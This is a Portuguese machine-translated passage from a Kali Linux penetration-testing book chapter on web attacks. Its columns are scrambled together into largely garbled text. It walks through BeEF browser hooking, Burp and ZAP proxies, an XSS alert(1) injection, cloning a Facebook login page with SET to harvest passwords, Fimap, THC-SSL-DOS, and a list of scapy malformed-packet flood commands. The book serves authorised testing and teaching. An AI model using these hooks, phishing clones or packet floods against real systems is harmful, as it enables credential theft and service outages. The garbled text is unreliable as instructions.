viso geral dos diferentes segurana baseados em host, como urlsnarf lista para eth0: / IP. mtodos utilizados anti-vrus, filtros de contedo, [208] [209] para confirmar a identidade. A prxima etc No passado, essas defesas foram seo coberto atacar o processo de suficientes, no entanto, as ameaas Captulo 5 Atacando Autenticao gesto esto se tornando mais urlsnarf ir exibir um dump de Patator sesses de autenticao. Em seguida, sofisticado hoje em dia, com a qualquer pedido de URL visto no fio. Patator um multi-purpose utilitrio de avaliou-se como os dados de sesso capacidade de contornar comercial da Por exemplo, fora bruta, com um design modular e armazenado em um usurio de prateleira ou um usurio de Windows acessos flexvel navegador por comprometer a gesto solues de segurana "COTS". As www.thesecurityblogger.com. As uso. Capacidades do patator incluem cookie. Ns, ento, coberto como ferramentas abordadas neste captulo solicitaes de URL so FTP, SSH-forando bruta, Telnet, capturar incluem mtodos apresentado em urlsnarf para uso SMTP, HTTP / as sesses de autenticao por Kali Linux, utilizado para contornar as futuro. HTTPS, POP, IMAP, LDAP, SMB, escondendo entre os alvos utilizando defesas de segurana padro a partir acccheck MSSQL, Oracle, MySQL, DNS, SNMP, vrias formas de man-in-the- de uma localizao remota. acccheck uma ferramenta de ataque e um ataque pelo meio. Este captulo termina arsenal de de dicionrio senha que tem como arquivos de senha. Vulnerabilidades de autenticao As ataque do verificador da penetrao. alvo a autenticao do Windows DBPwAudit duas sees finais avaliadas web Aps analisar o material utilizando o protocolo SMB. acccheck DBPwAudit realiza auditorias on-line servidores de aplicaes, tais como coberto nos captulos anteriores, voc um script invlucro em torno do de qualidade de senha para vrios injeo de SQL e cross-site scripting. deve entender como conduzir binrio smbclient, banco de dados O prximo captulo ir cobrir ataques reconhecimento e, como resultado, dependente dele motores. O aplicativo projetado para remotos ou da Internet para servidores em um alvo, identificar para a sua execuo. permitir a adio de drivers de banco e clientes. vulnerabilidades do servidor e do lado hexinject de dados adicionais [210] do cliente, e as tcnicas utilizadas hexinject um injetor pacote verstil e copiando novos drivers JDBC para o para sniffer que fornece uma linha de JDBC diretrio. Ataques na Web explor-los. Este captulo ir cobrir o comando Resumo O foco deste captulo ser sobre elemento final de ataque relacionado estrutura para o acesso rede cru. Comprometer autenticao permite ataques baseados na Internet. Os ao uso de web hexinject projetado para trabalhar que um atacante passar por uma administradores de segurana aplicaes como um front-end. Alm em conjunto com outros pessoa autorizada. para as organizaes esto disso, vamos explorar como tirar utilitrios de linha de comando, e por Isto pode ser til quando as conscientes de que h partidos proveito do esta razo que facilita a criao de aplicaes web de teste de maliciosos na Internet, prprio servidor web e de poderosos penetrao, porque ter continuamente procura de maneiras compromisso aplicaes web usando shell scripts capazes de leitura, acesso autorizado significa ignorar a de penetrar qualquer rede que se exploits, como navegador interceptar e modificar o trfego da maioria das defesas de segurana deparar e em ataques de explorao, ataques de rede em tradicionais. defesa, os administradores tm proxy e colheita senha. Ns tambm de forma transparente. hexinject pode Captulo 5, Atacar de autenticao, medidas de segurana no local. ir abranger injetar qualquer coisa na rede, bem focado em atacar como os usurios e Defesas comuns incluem como sistemas mtodos para interromper servios aplicaes de vrus visando os o servidor de carne bovina. Uma vez vulnervel a ataques, uma vez que se utilizando tcnicas de negao de vulnerabilidades encontradas em que comea a carne bovina, as URLs reconectar Internet, servio. navegadores comuns, tais como para gerenciar Carne de gancho independentemente se eles acessam Explorao Navegador Quadro - Internet Explorer e Firefox. vtimas vontade o link gancho antes de voltar a usar a Carne Carne bovina no est includo com a ser exibido na janela de terminal: internet. A prxima imagem mostra verso 1.0 do Kali Linux, mas pode Para acessar o servidor de principal de carne bovina Ataques na Web ser encontrada em administrao, abra um navegador e painel de instrumentos e opes Vulnerabilidades do browser pode ser beefproject.com. Esperamos carne v para a / Ui / painel disponveis para lanar contra um explorada por um software malicioso bovina para ser adicionado em uma URL. Quando enganando a vtima sistema viciado: para manipular o verso futura do Kali para ser fisgado por carne bovina, [214] o comportamento esperado de um Linux com base em sua popularidade redirecionar as vtimas para o navegador. Essas vulnerabilidades na comunidade de testes de URL do servidor gancho de carne Captulo 6 so um vetor de ataque popular, penetrao. bovina listados como hook.js. Voc vai O exemplo anterior mostra um laptop porque a maioria dos sistemas de Para instalar a carne, abra um precisar para desenvolver uma ligado do Windows. Carne bovina acolhimento alavancar algum tipo de terminal de comando em Kali Linux estratgia para obter pode revelar os detalhes, software navegador de Internet. como usurio root e emisso as vtimas para acessar sua URL por exemplo, se a vtima est usando Vamos os seguintes comandos: gancho, como um phishing ou ataque o Firefox, o Windows 32, plugins de dar uma olhada em uma ferramenta de engenharia social, navegadores especficos, popular desenvolvido para explorar que redireciona os usurios para scripts, se o Java est ativado e vulnerabilidades do navegador. apt-get update carne bovina. outras informaes teis. O atacante H muitas aplicaes de teste de apt-get install carne-XSS [213] pode penetrao legais que devem ser Voc pode ser solicitado a instalar, executar comandos em mquinas em includos em atualizar ou substituir alguns arquivos Ataques na Web forma de gancho, como fazer um som seu arsenal de hackers, como um dos mais antigos quando voc executar o Neste exemplo, iremos para: carrilho, sesso grab nossos favoritos conhecido como apt-get update comando. Na maioria http://172.16.86.144:3000/ui/panel. cookies, capturas de tela captura, Explorao Navegador dos casos, voc pode simplesmente Padro registrar as teclas digitadas, e at Quadro (Carne). A carne bovina um aceitar as instrues padro. nome de usurio e senha so carne mesmo usar o navegador viciado pacote baseado em navegador Quando o processo de atualizao for bovina. como explorar esse "ganchos" um ou mais concludo, voc pode usar apt-get Quando a vtima clica ou um proxy para atacar outros sistemas. navegadores como cabeas de ponte instalar Beef: redirecionado para o site "hook.js", o Outro exemplo ter o registro do para o lanamento de ataques. Um Uma vez que o processo for atacante do sistema viciado usurio pode ser ligado atravs do concludo, voc ter de carne bovina Servidor Beef ver o navegador no Facebook e usando carne bovina acesso a instalado no Kali Linux. viciado. Beef ir adicionar o novo para capturar o cookie de sesso. Um URL personalizado e continuar a ver o [212] sistema para uma lista de atacante pode responder trfego da web tpico, enquanto que metas e exibi-las se a vtima viciado para a sesso autenticada e ter um atacante tem acesso Captulo 6 online. Desconectado vtimas se acesso total a conta do Facebook da para a sesso do usurio. Beef ignora Para iniciar a carne, navegue at / Usr tornaro vtima. appliances de segurana de rede e / share / carne-XSS diretrio e tipo . / host-based, anti- Carne para iniciar As possibilidades para o mal ea que se apresentam como uma parte 4. Clique em Ok para salvar o novo www.DrChaos.com, Eles esperam destruio so infinitas. Esta cabea confivel proxy. para ser direcionado para o site. Um de ponte poderia permitir que um compartilhando coisas envolvidas com Neste ponto, FoxyProxy est servidor proxy atacante acesso irrestrito para o links maliciosos / software / cdigo e desativado permitir todo o trfego sem interceptar esse pedido e envi-lo em navegador do usurio e todas as assim por diante. um proxy no lugar, como nome de um cliente. Os servidores informaes que necessrio para FoxyProxy - Plugin do Firefox estabelecido Desabilitar proxy so normalmente acess-lo. Se voc planeja usar proxies para completamente o FoxyProxy no postas em prtica para inspecionar o Carne bovina fornece os detalhes dos testar aplicaes web, como Zed separador superior. Para usar um trfego e proteger os clientes a partir sistemas de gancho e registra os Proxy Ataque proxy, clique na guia de dados nocivos. Como comandos que so (ZAP) ou BURP, voc pode querer e alter-lo para o seu proxy desejado. Verificador da penetrao, voc pode executado. Ambos os detalhes dos usar o plugin do Firefox FoxyProxy Esta caracterstica faz com que seja usar um servidor proxy para hosts individuais e log de comando para simplificar fcil para alternar entre ou interceptar o trfego de um cliente, executado com sucesso alternando entre, bem como permitir o desativar proxies no Firefox copie informao pode ser copiado para um uso de Proxy. FoxyProxy uma rapidamente: o pedido, ou manipul-lo: relatrio final final: extenso do Firefox [217] Pergunte o que Bob [215] que permite que voc gerencie o tempo atual facilmente, mudana, habilitar ou Ataques na Web O que Ataques na Web desabilitar as configuraes de proxy BURP Proxy o tempo atual Defendendo contra ferramentas de no Firefox. Arroto Procurao uma ferramenta Alice penetrao baseados em navegador Voc pode baixar FoxyProxy do que intercepta trfego HTTP e Procurao difcil. A melhor defesa Firefox add-on biblioteca. HTTPS. Ela permite uma penetrao Prumo garantir que todos os softwares Uma vez FoxyProxy est instalado, Testador ao analisar um pedido, suas Bob diz que a baseados em navegador atualizado haver um cone adicionada no topo vulnerabilidades, eo de duas vias de o tempo 07:00 com as ltimas verses e do Firefox trfego entre O tempo patches de segurana, juntamente janela do navegador. Clique sobre um cliente e um servidor web. Arroto 7:00 com a desativao do navegador de isso para abrir a caixa de dilogo Procurao muito popular por causa Para iniciar Burp Suite, basta navegar executar Flash e Java. Em Opes FoxyProxy: de sua capacidade de no at: Barrilha |Sniffing / Spoofing solues disso, de segurana que [216] s examinar o trfego, mas tambm, |Sniffers Web podem detectar ameaas baseadas ele manipula solicitaes. Vamos e selecione Burp Suite. em aplicaes comuns, tais Captulo 6 examinar como [218] como Prxima Gerao de Intruso Para adicionar um proxy para Arroto Procurao usado para Sistemas de Preveno (NGIPS) pode FoxyProxy, faa o seguinte: manipular, responder e roubar Captulo 6 fornecer um extra 1. Clique no Adicionar Novo Proxy autenticao. Uma vez Arroto Suite lanado, voc camada de segurana. A maioria das boto, e uma nova janela ser aberta. importante lembrar que o arroto ser presenteado com o painel de vtimas de ferramentas de penetrao, 2. Selecionar Configurao manual do Procurao realmente uma parte de instrumentos lanamento Burp: como carne bovina so usurios proxy. Burp Suite, que Para configurar Burp, clique no que clicar em links includos em e- 3. Digite o endereo IP ou host eo uma coleo de ferramentas. Quando Procurao guia. Por padro, o mails ou convidados de mdia social nmero da porta do servidor proxy. um usurio digita uma URL no seu Interceptar boto selecionado navegador da Web, como http:// neste guia. Quando o Interceptar [219] webpage carregado com xito no no proxy. URLs que esto em cinza opo ativada, Burp pra todos os navegador da web. Algumas pginas significa que voc no tenha pedidos a partir de um Ataques na Web web tm mltiplas pesquisado diretamente os navegador para o servidor web. O Vamos usar a interface de loopback componentes, de modo que voc alvos, enquanto URLs em preto so recurso permite que um verificador da para o nosso exemplo: pode precisar para selecionar o Para a os locais em que foram explicitamente penetrao a capacidade de O prximo passo configurar o frente boto vrias vezes antes navegou: examinar uma ligao. O verificador navegador para usar Burp Suite. as cargas de pgina web. Para usar o Aranha funo, clique da penetrao pode permitir Todos os navegadores tm uma Outro recurso interessante Burp com o boto direito em um alvo e manualmente a conexo com de forma semelhante usando um Spider. Arroto Aranha oferece uma selecione Aranha este host: continuar uma vez que visto. servidor proxy. No prximo exemplo, forma de mapeamento web [222] O Interceptar boto exige a temos representado o aplicaes em uma forma interveno manual, ou o pedido ser definies para configurar um servidor automatizada. Como Burp Aranha Captulo 6 nunca faz-lo para o servidor web. proxy no Firefox: obras que primeiro Quando voc vai para o Aranha guia A prxima configurao encontrado Por exemplo a seguir, iremos para um configurao Burp a procurao seu no arroto, voc vai notar a Aranha na Opes submenu. Esta seo URL, como www.DrChaos.com em uso da Internet, como tnhamos Estado contagem permitem aos usurios verificar ou Firefox. Voc vai notar que nada explicado anteriormente. Em seguida, mudaram desde 0para um nmero de alterar a porta padro em que Burp acontece. Isto porque o Interceptar voc acumular: est em execuo, bem como caracterstica permitir Burp Aranha, e enquanto ele Se Burp encontra qualquer forma, ele configurar a interface de rede ou visto ativado por padro, como discutimos estiver sendo executado, Burp ir ir pedir-lhe para preencher os pelo arroto. Por padro, o arroto anteriormente. Agora voc pode ver a mapear todas as solicitaes e formulrios ou ignor-los. definido para ser executado no Interceptar guia em oferecem a possibilidade de aranha Se voc preencher os formulrios, interface de auto-retorno, como Burp mudou as cores para indicar um qualquer pedido capturado para Burp continuar a ver o que mais ele mostra a imagem a seguir. A interface novo pedido foi interceptada. encontrar novos alvos. pode aranha em pginas loopback um [220] Para usar o Aranha, clique no Aranha alm das formas: interface especial que geralmente tem aba para abrir a pgina de [223] o endereo IP do 127.0.0.1 associada Captulo 6 configurao padro. com ele. Faz Quando voc clica no Interceptar guia, Clique no Aranha est em pausa Ataques na Web no tem uma conexo de hardware voc vai ver a natureza exata do boto para alterar o status para Quando o Aranha processo estiver fsico vinculados a ela, mas um pedido. Aranha est em execuo: concludo, volte para Alvos guia e caminho para a operao Agora voc pode clicar em Para a [221] encontrar o host que voc sistema de referncia prprio. Em frente ou Cair para permitir ou negar o originalmente selecionado para outras palavras, quando voc quer se pedido especificamente Ataques na Web aranha. Clique no tringulo ao lado do comunicar com de continuar: Burp mapeia todas as solicitaes de anfitrio para expandi-lo. Voc -se em rede, voc pode usar um auto- Quando voc clica no Para a frente visto pelo proxy sob a Alvo guia. vai ver todos os resultados de aranha retorno. Se voc est pensando em boto, voc ver o pedido de Clique no Alvo sob o seu alvo original: testes Arroto Suite continuar guia para ver o que foi capturado. Burp mostra todas as pginas e links alm da mquina local, voc deve para o servidor, assim como a Haver uma lista de alvos que esto que o Aranha processo foi capturado. adicionar a sua interface Ethernet e resposta a partir do servidor. Alm sendo usados Alm disso, ele endereo IP. disso, voc deve ver o ir capturar o diretrio raiz, estilos de como XSS) vulnerabilidades. Voc vai precisar para gerar um Google criou o projeto Gruyere como pgina web, sub-pastas e scripts Java. ZAP vem embutido no Kali Linux 1.0, certificado antes de poder usar ZAP. um meio para testar exploits aplicao O e pode ser encontrado em Sniffing / Uma vez ZAP e Firefox so web prximo exemplo mostra vrias, sub- Spoofing | configurados, carregar qualquer URL e defesas. site O projeto Gyuyere tem pastas capturados no site Sniffers Web e selecionando OWASP no Firefox. Voc vai ver o vrias vulnerabilidades embutidos www.Drchaos.com. - ZAP, ou simplesmente abrir uma sites agora esto aparecendo na ZAP para ele, incluindo XSS. Voc pode [224] janela de terminal sob o Sites guia. Neste exemplo, ns executar o seu prprio projeto de e digitar zap, como mostrado no fomos Gruyere on-line, ou voc pode Captulo 6 exemplo a seguir: para www.DrChaos.com e percebi que transferi-lo para uma mquina local Burp tem a capacidade de filtrar os [225] temos muito poucos sites que foram para o seu teste: itens usando o cinza Filtro bar no topo carregados porque Crie a sua prpria instncia de da pgina. Ataques na Web de todos os links na Gruyere para testar ZAP. Quando Quando voc clica no Filtro boto, ele Aqui est um resumo da criao de www.DrChaos.com pgina: voc fizer isso voc vai ser dada vai expandir as opes disponveis ZAP com o Firefox, como explicado no ZAP tem a opo de executar seu prprio URL nico. Foi-nos dada para Captulo 3: scanners ativos ou passivos. Scans http://google-gruyere.appspot. filtrar os resultados: 1. Aceite o acordo de usurio. passivos no executar com/326352883334 / para o nosso O Aranha opo em Burp permite um 2. Gerar um certificado SSL ou ataques e deve ser seguro para ser URL. verificador da penetrao da web para importar um j existente. executado em qualquer aplicao Ns vamos voltar a ZAP e fazer uma ver como a web 3. Importe o certificado em um web. Varreduras ativas executado um varredura rpida deste URL: aplicao ou um site configurado, o navegador web como o Firefox, v em nmero [227] que os links so contidos, e para onde Preferncias |Avanado e de ataques e esto funcionando esses links levam. Uma analogia selecionando a Criptografia sub- ativamente cdigos contra aplicaes Ataques na Web deste conceito estar em uma sala seo. web, o que pode O exemplo a imagem mostra um com muitas portas 4. Clique em Exibir Certificados e disparar alarmes para determinados grupo de SEED arquivos, incluindo um e tendo a capacidade de explorar importar o certificado. produtos de defesa de segurana. que cada porta simultaneamente. 5. Confira todas as opes de [226] curiosamente rotulada: http://google- OWASP - ZAP confiana para o uso do novo gruyere.appspot.com/326352883334/ ZAP um fcil de usar, integrado certificado. Captulo 6 invlido. ferramenta teste de penetrao para 6. Configure seu navegador de O exemplo a seguir estar usando Quando colocamos isso em um encontrar o Internet para usar ZAP como o proxy ambos os scans ativa e passiva. navegador, obtemos a seguinte vulnerabilidades em aplicaes web. padro. No Firefox, uma boa idia mensagem de erro: Ns fornecemos uma breve viso isso encontrado em Preferncias ter um servidor web que voc pode Quando se trata de XSS, os geral de como usar |Avanado |Rede. testar em vez de tentar ZAP em um personagens mais perigosos so uma ZAP em Captulo 3 sobre a 7. Digite o servidor proxy localhost eo no autorizado URL <e >. Se um digitalizao de um alvo para nmero da porta 8080, Que o servidor. Porque queremos praticar hacker pode obter um aplicativo para possveis vulnerabilidades. Vamos padro para o proxy ZAP. em um servidor web vulnervel inserir o que eles querem em uma revisitar ZAP para identificao e 8. Marque a caixa para usar o servidor estamos autorizados pgina usando <e > explorao de cross-site scripting proxy para todos os protocolos. para o teste, vamos voltar a usar o (vulgarmente designado Google Gyuyere projeto. diretamente, que abre uma porta para como ataques XSS. Algumas pessoas Ferramentas de engenharia |se-toolkit. para garantir que voc tenha as injetar scripts maliciosos. Aqui esto acreditam que os usurios no Certifique-se SET atualizado se isso ltimas atualizaes. Se voc receber alguns outros precisam se preocupar com XSS se a primeira vez de us-lo. Passos um erro informando no interessante SEED arquivos: quando navegar em sites se o para atualizar SET Existem repositrios Git, voc pode ter [228] navegador anuncia que tem e verificar se GIT est instalado pode instalado GIT incorretamente ou o capacidades de defesa XSS. ser encontrada em Captulo 4. passos mudaram desde a escrita Captulo 6 A verdade por trs desse conceito Quando SET clones de um site, ele ir deste texto. Consulte a editora de Aqui est um exemplo de tirar proveito que a confiana na proteo do executar um servidor web. site, blog do Aamir Lakhani em de um desses SEED links por injeo navegador no pode ser perfeito, com importante www.DrChaos.com ou Jos Muniz de de um base que quem est sendo alvo capaz de blog em www.thesecurityblogger.com script. Vamos criar um URL e adicione no princpio de que os navegadores conectar ao seu servidor web. para mais truques sobre como usar o alert (1) script para ver se o site vai no esto cientes de quo seguro o Isto significa que qualquer ataque SET criar um erro de pop-up: cdigo est por trs da baseado na Internet ter de alavancar Kali com Linux. http://google- aplicao web. Hackers inteligentes um pblico 1. Uma vez que SET atualizado, gruyere.appspot.com/326352883334/ pode ser capaz de contornar essa Endereo IP (ou atravs de NAT ou selecione a opo 1 para ataques de alerta <script> (1); proteo, tais como directamente sobre Kali Linux), bem engenharia social-. </ Script> explorando uma vulnerabilidade de como 2. Selecione a opo 2 para Vetores O exemplo mostra o nosso problema XSS e emitir os scripts contra as abertura de regras de firewall para de Ataque Site de servidor de aplicao web alvo foras que visitam o site. permitir o acesso a Kali de um local 3. Selecione a opo 3 para uma prova de contexto que Melhores prticas para proteger seu remoto. Credencial Harvester Ataque este site vulnervel a um ataque. servidor e os clientes acessar seus Depois de ter tomado o cuidado de Voc tem algumas opes de como Podemos usar ZAP para repetir o aplicativos todas as configuraes de IP, hora voc deseja clonar um site. SET tem ataque, tente outro identificando e corrigindo de lanar SET: modelos para ataques ou mtodos de ensaio XSS vulnerabilidades usando uma Vamos agora usar SET para colher sites populares, como Facebook e similares. ferramenta como o ZAP. senhas. SET tem a capacidade de Gmail. s vezes, esses modelos no Recomendamos a brincar com os [229] clonar qualquer site funcionam; erros que voc encontrar e ver se voc quer. Estamos realmente indo no entanto, recomendvel comear voc pode manipular Ataques na Web para escolher um dos engenharia com estes ou clonagem de outro site. -los para gerar uma sada sensvel Colheita senha SET social mais popular Para clone para seus exerccios de testes de Foram examinados os fundamentos sites neste exemplo clonar. Concordar um site, voc precisa de um URL, e penetrao. O Gruyere da Engenharia Social Toolkit (SET) em qualquer contrato de licena que SET ir automaticamente tentar clon- projeto uma tima maneira de testar em Captulo 4. Estamos voc pode se deparar lo. suas habilidades de encontrar outras vai revisitar SET e olhar para alguns com SET: Se voc j tiver um site clonado ou se vulnerabilidades usando ZAP. conceitos avanados de colheita e [230] os arquivos HTML carregado no Kali, Para se defender contra ataques senha voc pode remotos, ZAP pode ser timo para captura de informaes privilegiadas. Captulo 6 selecionar importao personalizada. testes de vulnerabilidades web, tais Como um lembrete, vamos lanar Selecionando a opo 5 Ao selecionar esta opo, voc SET, indo para Ferramentas de recomendado para atualizar SET precisa dizer onde Kali Explorao |Social antes de usar a ferramenta os arquivos HTML esto localizados Fimap. Quando voc abre Fimap, uma exemplo mostra que o nosso objectivo no sistema de arquivos local. Captulo 6 janela de terminal abre exibindo a no vulnervel a um ataque de [231] Quando entramos em nosso nome de casa incluso de arquivos: usurio no site falso Facebook, SET tela. Fimap tem algumas opes do Negao de Servios (DoS) Ataques na Web captura o trfego. plugin, que voc pode baixar usando a Normalmente, um exerccio de teste Para o nosso exemplo, vamos SET tambm ir redirecionar os seguinte comando: de penetrao focada em identificar escolher modelos de web. SET vai usurios para o site real. A esperana Fimap - install-plugins as lacunas na perguntar sobre o endereo IP que as vtimas sero Todos os plugins disponveis sero segurana, em vez de prejudicar o deve escutar. Este ser o endereo IP acredito que eles entraram na sua exibidos como uma lista, com a opo sistema. Esta uma caracterstica para a interface em Kali Linux. O senha incorreta quando redirecionado de escolher um para instalar chave que separa uma verdadeira exceo a isso quando se usa NAT para o real e Facebook ou ento sair. No exemplo a seguir, h atacante de um verificador da em um firewall. Nesse caso, voc vai continuar usando Facebook sem dois plugins disponveis para instalar. penetrao autorizado. Hackers de precisar usar saber que SET capturado suas Voc verdade no seguem as regras o NAT ou o endereo pblico, em vez credenciais de login: ter que executar o comando instalar e no esto preocupados com a de endereo IP na Kali Linux para que O exemplo anterior mostra SET havia duas vezes para instalar cada plugin interrupo de negcios, se ele pode as metas podem capturado o nosso nome de usurio: individualmente: melhorar a sua situao. acessar o sistema. O prximo DrChaos, e nossa Para usar Fimap, primeiro voc Em alguns casos, um hacker est exemplo usar o endereo de Senha como ILoveKali. precisa determinar o seu alvo, olhando para criar qualquer tipo de loopback local 127.0.0.1. Quando tiver concludo este exerccio, especificando a URL. L impacto negativo sobre um alvo, Em seguida, SET vai pedir para pressione Ctrl + C para sair da so opes para especificar uma URL, incluindo derrubar sistemas crticos. selecionar um modelo. Para este ferramenta SET e uma lista de URLs usando o Google Por esta razo, faz todo o sentido, em exemplo, vamos selecionar Facebook. gerar um relatrio HTML. SET cria um para adquirir URLs, ou outro alguns casos O prximo exemplo mostra um relatrio profissional que pode ser mtodos, como URLs de colheita de para testar sistemas para o risco de navegador indo para 127.0.0.1 e utilizado em outras URLs, bem como olhar para as Denial of Service (DoS) tipo ataques. exibindo o nosso falso seu teste de penetrao relata: formas e Isto vulgarmente Facebook page. Se uma pgina [233] cabealhos. Por exemplo, o seguinte, denominado como testes de estresse modelo no parece muito bem, voc vamos direcionar de seus servios voltado para a pode querer usar um Ataques na Web www.thesecurityblogger.com. Internet. diferente modelo ou clonar a pgina Fimap [234] absolutamente fundamental ter uma desejada: Fimap uma ferramenta Python que aprovao para testar um trunfo para Observe nossa estados barra de pode encontrar, preparar, auditoria, Captulo 6 DoS endereo 127.0.0.1. Normalmente, explorar e Google automaticamente Para digitalizar thesecurityblogger.com vulnerabilidades. Alguns mtodos de voc precisar usar algum outro para o arquivo local e remoto Incluso site, digite o seguinte comando: ataque pode ter um impacto negativo vetor de ataque para enganar os (LFI e RFI) bugs em aplicaes web. Fimap-u 'http://wwwthesecuri- para usurios para ir para o seu site. H Fimap pode ser encontrado em tyblogger.com' um sistema de teste ps-penetrao. inmeras maneiras de fazer isso, Aplicaes Web |Scanners de Fimap tentar identificar as Aconselha-se a testar contra como enviar-lhes um link ou um e-mail Vulnerabilidade Web | vulnerabilidades de incluso de redundante falso: arquivos. A sequncia [232] sistemas, equipamentos de inundaes baseadas em pacotes DoS. Aqui esto mais algumas laboratrio, ou sistemas de no- falsificados. O propsito o de saturar ferramentas Captulo 6 produo, se possvel. a largura de banda de disponvel em Kali Linux para realizar Para acessar THC-SSL-DOS, O ataque mais comum envolve DoS website da vtima. ataques DoS: navegue at Teste de Estresse |Teste inundando um alvo com a Os ataques de protocolo: Ele consome Para testar DoS, voc pode usar Web Stress |THC-SSL- comunicao externa recursos de servidores ou www.upordown.org para ver se dos. Isso far com que uma janela do pedidos. Essa sobrecarga impede o intermedirio um site est disponvel. terminal com a pgina inicial para recurso de responder ao trfego equipamentos de comunicao, tais THC-SSL-DOS THC-SSL-DOS. Para legtimo, como roteadores, firewalls, O Secure Socket Layer (SSL) usado executar THC-SSL-DOS contra um ou retarda a sua resposta de forma balanceadores de carga, para proteger as conexes e alvo, o tipo t: to significativa que ele processado e assim por diante. Exemplos disso transaes atravs da Internet. THC-SSL-dos [opes] <ip do <port> indisponveis. Ataques DoS so as inundaes SYN, Ping da Estabelecendo uma conexo segura victim> e - aceitar pode direcionar os recursos do morte, Smurf, Teardrop, SSL requer de 15x Voc deve incluir - Aceitar ou voc sistema (IE espao em disco, largura pacotes fragmentados, e assim por mais poder de processamento no receber a seguinte mensagem de de banda, e assim por diante), a diante. servidor do cliente. THC-SSL-DOS erro: configurao Ataques Camada de Aplicao: Ele explora este Uma vez THC-SSL-DOS executado, informao (ou seja, remover tabelas aproveita o trfego legtimo para travar propriedade assimtrica por voc ver alguns palavreado de rotas), informaes sobre o estado a web sobrecarregar o servidor at que ele engraado informando que (o restabelecimento sesso TCP), ou servio. Os exemplos incluem ataques incapaz de fornecer qualquer iniciar o processo de aperto de mo e qualquer coisa que possa prejudicar o de dia zero, a explorao da servio a usurios legtimos. O ataque que est sendo explorado. Na imagem funcionamento do sistema. vulnerabilidade, explora o recurso de re-negociao seguinte, A diferena entre um e DoS Negao e assim por diante. segura SSL vamos mostrar um site que no de servio distribuda Sesso de Exausto: Abusando para disparar milhares de alavancar SSL, portanto mostrando (DDoS) que um ataque de negao limitaes sesso, estabelecendo renegociaes usando uma nica erros de conexo. de servio envolve uma mquina repetidamente conexo TCP. Isto conhecido A segunda imagem mostra os apertos enquanto um DDoS mas no fechando novas sesses como SSL-Exausto ataque. A de mo bem-sucedidas, o que ataque envolve muitos. DDoS est com o objetivo de consumir recursos. vantagem desta abordagem que a acabar fora do escopo deste texto. transformao DoS o alvo. Lembre-se, voc s deve [235] capacidade de apertos de mo SSL tentar isso em IPs e sites voc muito superior no lado do cliente, o tem permisso para testar. Estes Ataques na Web Kali Linux contm vrias ferramentas que significa que um comum ataques podem danificar severamente Existem quatro categorias principais de explorao de vulnerabilidade laptop atravs de uma conexo de um web site ou de ataque DoS / DDoS: abordados no anterior rede mdia pode desafiar um servidor aplicao web: captulos que podem ser usados para de aplicativos web. [237] Desconto Baseado Ataques: Trata-se a camada de aplicao ataques DoS Esta uma vulnerabilidade conhecida, de enchentes, inundaes UDP ICMP, como Metasploit. e no existe soluo real para Ataques na Web e outros Alm disso, Captulo 3 cobria uma remediar este a partir do Scapy ferramenta popular scapy Protocolo escrita deste texto. [236] Uma das ferramentas mais populares em nosso servidor Kali para o enviar (IP (dst = "10.0.0.1") / TCP iface = "eth0", count = 2000) DoS scapy. Scapy uma ferramenta endereo de destino 10.0.0.1. Alm (flags = 0x0ff), iface = "eth0", count = [239] de manipulao de pacotes para disso, estamos enviando 2000) redes de computadores, escrito em o alvo de um tempo para viver valor FIN nico conjunto Ataques na Web Python por Philippe Biondi. Scapy de 0. Isso muito bonito impossvel enviar (IP (dst = "10.0.0.1") / TCP L2 Comprimento >> IP Comprimento pode forjar ou decodificar de um TCP (flags = "F"), iface = "eth0", count = enviar (IP (dst = "10.0.0.1", len = 32) / pacotes, envi-los no fio, captur-los, ponto de vista. Essencialmente, 2000) Raw (load = "bla-bla-bla-bla-bla-bla- e as solicitaes e as respostas de estamos tentando confundir o servidor Length> L2 Comprimento bla-bla "), iface =" eth0 ", count = jogo. Alm disso, web com um mau TTL enviar (IP (dst = "10.0.0.1", src = 2000) ele pode lidar com tarefas como valor. Atacantes na vida real mandar "10.20.30.40", o DIH = 15L) / TCP enviar (IP (dst = "10.0.0.1", len = 32) / digitalizao, tracerouting, sondagem, milhes desses pacotes. Deve notar- (dport = "www"), UDP (dport = 80, len = 48) / Raw (load testes de unidade, ataques, e se que um iface = "eth0", count = 2000) = a descoberta de rede. sistema sob as circunstncias corretas Comprimento Header Too Short "Bla-bla-bla-bla-bla-bla-bla-bla"), iface Um truque comum manipular pode falhar ou se tornar corruptos de enviar (IP (dst = "10.0.0.1", src = = "eth0", count = 2000) pacotes TCP do Kali e envi-lo via uma nica m "10.20.30.40", o DIH = 2L) / TCP enviar (IP (dst = "10.0.0.1", len = 32) / scapy. ou pacote malformado. Podemos (dport = "www"), ICMP () / Raw (load = "bla-bla-bla-bla- Para iniciar scapy, tipo scapy na ajustar a contagem ou outros iface = "eth0", count = 2000) bla-bla-bla-bla "), iface =" eth0 ", count janela do terminal. Uma vez scapy foi parmetros que podem precisar de ICMP Flood = 2000) lanado, para o nosso ataque: enviar (IP (dst = "10.0.0.1") / ICMP (), No L4 digitar sintaxe de comando: Aqui esto alguns outros cenrios de iface = "eth0", count = 2000) enviar (IP (dst = "10.0.0.1", src = Nesta tela a seguir, vamos usar scapy ataque populares usados por scapy: IP erro de checksum "10.20.30.40"), iface = "eth0," count = para enviar TCP malformado Bad IP verso enviar (IP (dst = "10.0.0.1", src = 2000) pacotes para o nosso servidor de enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) / SYN && FIN Set teste. Neste caso de uso, o nosso "10.20.30.40", verso = 0) / TCP (dport = "www"), iface = "eth0", enviar (IP (dst = "10.0.0.1") / TCP servidor de teste 10.0.0.1. Este pode TCP (dport = "www"), iface = "eth0", count = 2000) (flags = "FS"), iface = "eth0", count = ser um count = 2000) IP Fragment 2000) roteador ou um servidor web. [238] enviar (IP (dst = "10.0.0.1", src = TCP Header Length> L2 Comprimento Tambm, vamos especificar o nmero "10.20.30.40", frag = 1) / TCP (dport = enviar (IP (dst = "10.0.0.1", src = de pacotes que sero Captulo 6 "www"), "10.20.30.40") / enviar para o nosso destino. Neste Bad TCP checksum iface = "eth0", count = 2000) TCP (dport = "www", dataofs = 15L), caso estamos enviando 2000 pacotes enviar (IP (dst = "10.0.0.1") / TCP IP Comprimento> L2 Comprimento iface = "eth0", count = 2000) usando o comando: (chksum = 0x5555), iface = "eth0", enviar (IP (dst = "10.0.0.1", src = TCP Header Length Too Short enviar (IP (dst = "10.0.0.1", ttl = 0) / count = 2000) "10.20.30.40", o DIH = 5L, len = 80) / (comprimento <5) TCP (), iface = "eth0", count = 2000) Bad TCP Flags (tudo esclarecido e TCP (dport = "www"), iface = "eth0", enviar (IP (dst = "10.0.0.1", src = Na linha de comando 